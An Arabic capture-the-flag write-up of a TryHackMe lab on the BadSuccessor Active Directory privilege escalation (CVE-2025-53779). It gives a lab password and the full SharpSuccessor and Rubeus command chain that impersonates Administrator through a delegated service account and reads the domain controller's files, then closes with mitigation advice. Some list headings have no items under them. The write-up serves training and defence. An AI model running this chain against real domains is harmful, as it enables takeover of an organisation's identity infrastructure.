
غرفة TryHackme تغطي استغلال CVE-2025-53779 باستخدام Windows
في هذه الغرفة، نستكشف تقنية تصعيد الامتيازات BadSuccessor، وهي ثغرة تستغل حسابات الخدمة المُدارة المفوضة (dMSAs) في Active Directory. يسمح الهجوم للمستخدم الذي يتمتع بالتحكم الكافي في كائن dMSA بانتحال هوية حساب آخر وربما تحقيق امتيازات مسؤول المجال.
الغرفة: https://tryhackme.com/room/adbadsuccessor
الصعوبة: متوسطة
التاريخ: 05/06/2026
الإصدار: 1.0
الهدف: إظهار كيف يمكن إساءة استخدام حسابات الخدمة المُدارة المفوضة لتصعيد الامتيازات واختراق بيئة Active Directory.
الدور: Terry Byte (tbyte)
الغاية: تقييم أمان بيئة Active Directory المنشورة حديثًا وتحديد ما إذا كانت عرضة لهجوم BadSuccessor.
يتكون الهجوم من مرحلتين رئيسيتين:
xfreerdp /v:10.211.101.20 /u:tbyte /p:P\@SSw0rd345 /dynamic-resolution
انتقل إلى دليل إثبات المفهوم:
cd C:\PoC
تحقق من المحتويات: dir
https://github.com/akamai/BadSuccessor/blob/main/Get-BadSuccessorOUPermissions.ps1
notepad Get-BadSuccessorOUPermissions.ps1
.\Get-BadSuccessorOUPermissions.ps1
استخدم SharpSuccessor لإنشاء حساب خدمة مُدار مفوض ينتحل هوية حساب Administrator:
.\SharpSuccessor.exe add /path:"ou=LabOU,dc=tryhackme,dc=local" /account:tbyte /name:pentest_dmsa /impersonate:Administrator
ماذا يحدث؟
استخدم Rubeus للحصول على تذكرة منح تذاكر مفوضة (TGT):
.\Rubeus.exe tgtdeleg /nowrap
يُرجع الأمر تذكرة Kerberos مشفرة بـ Base64.
انسخ التذكرة المولّدة.
.\Rubeus.exe asktgs /targetuser:pentest_dmsa$ /service:krbtgt/tryhackme.local /opsec /dmsa /nowrap /ptt /ticket:<Base64_Ticket>
النتيجة:
يتم حقن تذكرة Kerberos جديدة في الذاكرة لحساب dMSA.
استفد من تذكرة dMSA للوصول إلى الخدمات التي تعمل بسياق Administrator:
.\Rubeus.exe asktgs /user:pentest_dmsa$ /service:cifs/DC-LAB2025-01.tryhackme.local /opsec /dmsa /nowrap /ptt /ticket:<Base64_Ticket>
النتيجة:
dir \\DC-LAB2025-01.tryhackme.local\c$\Users\Administrator\Desktop\
اقرأ العلم المخزن على سطح مكتب Administrator:
Get-Content \\DC-LAB2025-01.tryhackme.local\c$\Users\Administrator\Desktop\flag.txt
تم الحصول على العلم بنجاح.
يوضح BadSuccessor كيف يمكن لحسابات الخدمة المُدارة المفوضة أن تُدخل مسارات تصعيد امتيازات في بيئات Active Directory. نظرًا لأن Active Directory يعد العمود الفقري للهوية في العديد من المؤسسات، فإن الثغرات التي تؤثر على Kerberos وتفويض الحسابات قد تكون لها عواقب وخيمة.
يمكن للمهاجم الذي يمتلك صلاحيات كافية على كائن dMSA أن:
للتخفيف من BadSuccessor (CVE-2025-53779)، يجب على المؤسسات تطبيق التحديثات الأمنية من Microsoft على الفور، وتقييد صلاحيات dMSA ومراجعتها، ومراقبة نشاط Kerberos المشبوه، وتدقيق علاقات التفويض، وتطبيق مبدأ الامتياز الأقل. يمكن للمراجعات المنتظمة لإعدادات التفويض في Active Directory المساعدة في تحديد وتقليل مسارات تصعيد الامتيازات المحتملة.
قدمت هذه الغرفة خبرة عملية قيّمة في: